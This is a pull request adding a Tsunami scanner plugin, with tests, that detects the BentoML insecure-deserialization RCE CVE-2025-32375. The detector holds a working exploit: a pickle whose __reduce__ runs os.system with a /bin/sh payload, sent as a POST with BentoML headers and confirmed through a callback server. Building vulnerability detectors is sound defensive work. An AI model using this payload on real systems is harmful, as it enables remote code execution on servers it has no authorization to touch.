### PR TITLE
Add BentoML CVE-2025-32375 detector

### DIFF
--- a/py_plugins/bentoml_deserialization_rce_cve202532375/bentoml_deserialization_rce_cve202532375.py
+++ b/py_plugins/bentoml_deserialization_rce_cve202532375/bentoml_deserialization_rce_cve202532375.py
@@ -1,0 +1,210 @@
+# Copyright 2025 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+"""A Tsunami plugin for detecting CVE-2025-32375."""
+from absl import logging
+from common.data import network_endpoint_utils
+from common.data import network_service_utils
+from common.net.http.http_client import HttpClient
+from common.net.http.http_headers import HttpHeaders
+from common.net.http.http_request import HttpRequest
+from google.protobuf import timestamp_pb2
+from plugin.payload.payload_generator import PayloadGenerator
+import detection_pb2
+import payload_generator_pb2 as pg
+import pickle
+import plugin_representation_pb2
+import time
+import tsunami_plugin
+import vulnerability_pb2
+import requests
+
+_VULN_DESCRIPTION = (
+    "The BentoML framework is vulnerable to an insecure deserialization issue that can "
+    "be exploited by sending a single POST request to any valid endpoint of the runner server."
+    "The impact of this is remote code execution."
+)
+_SLEEP_TIME_SEC = 20
+
+
+class Cve202532375Detector(tsunami_plugin.VulnDetector):
+    """A TsunamiPlugin that detects RCE on the BentoML target."""
+
+    def __init__(self, http_client: HttpClient, payload_generator: PayloadGenerator):
+        self.http_client = http_client
+        self.payload_generator = payload_generator
+
+    def GetPluginDefinition(self) -> tsunami_plugin.PluginDefinition:
+        """Defines the PluginDefinition for Cve202532375Detector.
+
+        Returns:
+          The PluginDefinition used for the Tsunami engine to identify this plugin.
+        """
+        return tsunami_plugin.PluginDefinition(
+            info=plugin_representation_pb2.PluginInfo(
+                type=plugin_representation_pb2.PluginInfo.VULN_DETECTION,
+                name="Cve202532375VulnDetector",
+                version="1.0",
+                description=_VULN_DESCRIPTION,
+                author="GEBIRGE",
+            )
+        )
+
+    def Detect(
+        self,
+        target: tsunami_plugin.TargetInfo,
+        matched_services: list[tsunami_plugin.NetworkService],
+    ) -> tsunami_plugin.DetectionReportList:
+        """Run detection logic for the BentoML target.
+
+        Args:
+          target: TargetInfo about BentoML Insecure Deserialization.
+          matched_services: A list of network services whose vulnerabilities could
+            be detected by this plugin. "ppp" for example would be on this list.
+
+        Returns:
+          A tsunami_plugin.DetectionReportList for all the vulnerabilities of the
+          scanning target.
+        """
+        logging.info("Cve202532375Detector starts detecting.")
+        vulnerable_services = [
+            service
+            for service in matched_services
+            if self._IsSupportedService(service) and self._IsBentoMlWebService(service)
+        ]
+
+        return detection_pb2.DetectionReportList(
+            detection_reports=[
+                self._BuildDetectionReport(target, service)
+                for service in vulnerable_services
+                if self._IsServiceVulnerable(service)
+            ]
+        )
+
+    def _IsSupportedService(
+        self, network_service: tsunami_plugin.NetworkService
+    ) -> bool:
+        """Check if network service is a web service or an unknown service."""
+        return (
+            not network_service.service_name
+            or network_service_utils.is_web_service(network_service)
+            or network_service_utils.get_service_name(network_service) == "unknown"
+            or network_service_utils.get_service_name(network_service) == "ppp"
+        )
+
+    def _IsBentoMlWebService(
+        self, network_service: tsunami_plugin.NetworkService
+    ) -> bool:
+        """Check if this web service is a BentoML web application."""
+        url = self._BuildUrl(network_service, "/")
+        request = HttpRequest.get(url).with_empty_headers().build()
+        try:
+            response = self.http_client.send(request, network_service)
+            return "Method Not Allowed" in response.body_string()
+        except Exception:  # pylint: disable=broad-exception-caught
+            logging.exception("Unable to query %s", url)
+        return False
+
+    def _IsServiceVulnerable(
+        self, network_service: tsunami_plugin.NetworkService
+    ) -> bool:
+        """Check if network service may result in RCE."""
+
+        config = pg.PayloadGeneratorConfig(
+            vulnerability_type=pg.PayloadGeneratorConfig.VulnerabilityType.BLIND_RCE,
+            interpretation_environment=pg.PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL,
+            execution_environment=pg.PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT,
+        )
+        payload = self.payload_generator.generate(config)
+        if not payload.get_payload_attributes().uses_callback_server:
+            return False
+
+        class Payload(object):
+            def __reduce__(self):
+                return (
+                    __import__("os").system,
+                    (f'/bin/sh -c "{payload.get_payload()}"',),
+                )
+
+        rce_command = pickle.dumps(Payload())
+        url = self._BuildUrl(network_service, "/")
+        request = (
+            HttpRequest.builder()
+            .set_method("POST")
+            .set_url(url)
+            .set_headers(
+                HttpHeaders.builder()
+                .add_header("args-number", "1")
+                .add_header("Content-Type", "application/vnd.bentoml.pickled")
+                .add_header("Payload-Container", "NdarrayContainer")
+                .add_header("Payload-Meta", '{"format": "default"}')
+                .add_header("Batch-Size", "-1")
+                .build()
+            )
+            .set_request_body(rce_command)
+            .build()
+        )
+        try:
+            self.http_client.modify().set_timeout_sec(1).build().send(
+                request, network_service
+            )
+        except (
+            requests.exceptions.ReadTimeout
+        ):  # pylint: disable=broad-exception-caught
+            # timeout is expected here because server won't return anything
+            pass
+        except Exception:  # pylint: disable=broad-exception-caught
+            logging.exception("Unable to query %s", url)
+
+        time.sleep(_SLEEP_TIME_SEC)
+        return payload.check_if_executed()
+
+    def _BuildUrl(
+        self, network_service: tsunami_plugin.NetworkService, vulnerable_path
+    ) -> str:
+        """Build the vulnerable target path for RCE injection."""
+        if network_service_utils.is_web_service(network_service):
+            url = network_service_utils.build_web_application_root_url(network_service)
+        else:
+            url = "http://{}/".format(
+                network_endpoint_utils.to_uri_authority(
+                    network_service.network_endpoint
+                ).strip("/")
+            )
+        return url + vulnerable_path.strip("/")
+
+    def _BuildDetectionReport(
+        self,
+        target: tsunami_plugin.TargetInfo,
+        vulnerable_service: tsunami_plugin.NetworkService,
+    ) -> detection_pb2.DetectionReport:
+        """Generate the detection report for all vulnerability findings."""
+        return detection_pb2.DetectionReport(
+            target_info=target,
+            network_service=vulnerable_service,
+            detection_timestamp=timestamp_pb2.Timestamp().GetCurrentTime(),
+            detection_status=detection_pb2.DetectionStatus.VULNERABILITY_VERIFIED,
+            vulnerability=vulnerability_pb2.Vulnerability(
+                main_id=vulnerability_pb2.VulnerabilityId(
+                    publisher="TSUNAMI_COMMUNITY", value="CVE_2025_32375"
+                ),
+                severity=vulnerability_pb2.Severity.CRITICAL,
+                title=(
+                    "BentoML Insecure Deserialization RCE (CVE-2025-32375) for Runner Server"
+                ),
+                recommendation=(
+                    "Users should not expose the bentoml Runner Server endpoints to untrusted environments."
+                ),
+                description=_VULN_DESCRIPTION,
+            ),
+        )

--- a/py_plugins/bentoml_deserialization_rce_cve202532375/bentoml_deserialization_rce_cve202532375_tests.py
+++ b/py_plugins/bentoml_deserialization_rce_cve202532375/bentoml_deserialization_rce_cve202532375_tests.py
@@ -1,0 +1,170 @@
+# Copyright 2025 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+"""Tests for Cve202532375Detector."""
+from absl.testing import absltest
+from common.data import network_endpoint_utils
+from common.net.http.requests_http_client import RequestsHttpClientBuilder
+from plugin.payload.payload_generator import PayloadGenerator
+from plugin.payload.payload_secret_generator import PayloadSecretGenerator
+from plugin.payload.payload_utility import get_parsed_payload
+from plugin.tcs_client import TcsClient
+from py_plugins.bentoml_deserialization_rce_cve202532375 import Cve202532375Detector
+from py_plugins.bentoml_deserialization_rce_cve202532375 import _VULN_DESCRIPTION
+import detection_pb2
+import network_pb2
+import network_service_pb2
+import plugin_representation_pb2
+import reconnaissance_pb2
+import requests_mock
+import software_pb2
+import tsunami_plugin
+import unittest.mock as umock
+import vulnerability_pb2
+
+# Callback server
+_CBID = "04041e8898e739ca33a250923e24f59ca41a8373f8cf6a45a1275f3b"
+_IP_ADDRESS = "127.0.0.1"
+_PORT = 8000
+_SECRET = "a3d9ed89deadbeef"
+_CALLBACK_URL = "http://%s:%s/%s" % (_IP_ADDRESS, _PORT, _CBID)
+
+# Vulnerable target
+_TARGET_URL = "vuln-target.com"
+_TARGET_PORT = 9001
+
+
+class Cve202532375DetectorTest(absltest.TestCase):
+    def setUp(self):
+        super().setUp()
+        # payload generator and client with callback
+        request_client = RequestsHttpClientBuilder().build()
+        self.psg = PayloadSecretGenerator()
+        self.psg.generate = umock.MagicMock(return_value=_SECRET)
+        callback_client = TcsClient(_IP_ADDRESS, _PORT, _CALLBACK_URL, request_client)
+        self.payloads = get_parsed_payload()
+        self.payload_generator = PayloadGenerator(
+            self.psg, self.payloads, callback_client
+        )
+        # detector
+        self.detector = Cve202532375Detector(request_client, self.payload_generator)
+
+    @requests_mock.mock()
+    def test_detect_service_with_callback_server_returns_vul(self, mock):
+        mock.register_uri(
+            "GET",
+            "http://%s:%s/" % (_TARGET_URL, _TARGET_PORT),
+            content="Method Not Allowed".encode("utf-8"),
+            status_code=200,
+        )
+        mock.register_uri(
+            "POST",
+            "http://%s:%s/" % (_TARGET_URL, _TARGET_PORT),
+            content="".encode("utf-8"),
+            status_code=200,
+        )
+        # response for callback server
+        body = '{ "has_dns_interaction":false, "has_http_interaction":true}'
+        mock.register_uri(
+            "GET",
+            "%s/?secret=%s" % (_CALLBACK_URL, _SECRET),
+            content=body.encode("utf-8"),
+        )
+        network_service = network_service_pb2.NetworkService(
+            network_endpoint=network_endpoint_utils.for_hostname_and_port(
+                _TARGET_URL, _TARGET_PORT
+            ),
+            transport_protocol=network_pb2.TransportProtocol.TCP,
+            software=software_pb2.Software(name="http"),
+        )
+        target_info = reconnaissance_pb2.TargetInfo(
+            network_endpoints=[network_service.network_endpoint]
+        )
+        detection_reports = self.detector.Detect(target_info, [network_service])
+        self.assertEqual(
+            detection_pb2.DetectionReport(
+                target_info=target_info,
+                network_service=network_service,
+                detection_status=detection_pb2.VULNERABILITY_VERIFIED,
+                vulnerability=vulnerability_pb2.Vulnerability(
+                    main_id=vulnerability_pb2.VulnerabilityId(
+                        publisher="TSUNAMI_COMMUNITY", value="CVE_2025_32375"
+                    ),
+                    severity=vulnerability_pb2.Severity.CRITICAL,
+                    title=(
+                        "BentoML Insecure Deserialization RCE (CVE-2025-32375) for Runner Server"
+                    ),
+                    recommendation=(
+                        "Users should not expose the bentoml Runner Server endpoints to untrusted environments."
+                    ),
+                    description=_VULN_DESCRIPTION,
+                ),
+            ),
+            detection_reports.detection_reports[0],
+        )
+
+    #  OK
+    @requests_mock.mock()
+    def test_detect_vuln_target_with_callback_server_returns_empty(self, mock):
+        mock.register_uri(
+            "GET",
+            "http://%s:%s/" % (_TARGET_URL, _TARGET_PORT),
+            content="Method Not Allowed".encode("utf-8"),
+            status_code=200,
+        )
+        mock.register_uri(
+            "POST",
+            "http://%s:%s/" % (_TARGET_URL, _TARGET_PORT),
+            content="".encode("utf-8"),
+            status_code=200,
+        )
+        # response for callback server
+        body = '{ "has_dns_interaction":false, "has_http_interaction":true}'
+        mock.register_uri(
+            "GET",
+            "%s/?secret=%s" % (_CALLBACK_URL, _SECRET),
+            content=body.encode("utf-8"),
+            status_code=404,
+        )
+        network_service = network_service_pb2.NetworkService(
+            network_endpoint=network_endpoint_utils.for_hostname_and_port(
+                _TARGET_URL, _TARGET_PORT
+            ),
+            transport_protocol=network_pb2.TransportProtocol.TCP,
+            software=software_pb2.Software(name="http"),
+            service_name="http",
+        )
+        target_info = reconnaissance_pb2.TargetInfo(
+            network_endpoints=[network_service.network_endpoint]
+        )
+        detection_reports = self.detector.Detect(target_info, [network_service])
+        self.assertEmpty(detection_reports.detection_reports)
+
+    #  OK
+    def test_get_plugin_definition_returns_plugin_definition(self):
+        self.assertEqual(
+            tsunami_plugin.PluginDefinition(
+                info=plugin_representation_pb2.PluginInfo(
+                    type=plugin_representation_pb2.PluginInfo.VULN_DETECTION,
+                    name="Cve202532375VulnDetector",
+                    version="1.0",
+                    description=_VULN_DESCRIPTION,
+                    author="GEBIRGE",
+                )
+            ),
+            self.detector.GetPluginDefinition(),
+        )
+
+
+if __name__ == "__main__":
+    absltest.main()


### PR DESCRIPTION
Hey!

This is the PR for https://github.com/google/tsunami-security-scanner-plugins/issues/628.
The PR for the testbed can be found here https://github.com/google/security-testbeds/pull/136.

I've kept the structure of the [previous](https://github.com/google/tsunami-security-scanner-plugins/pull/567) BentoML plugin, which is approved but unmerged at the time of writing.

Cheers
Frederic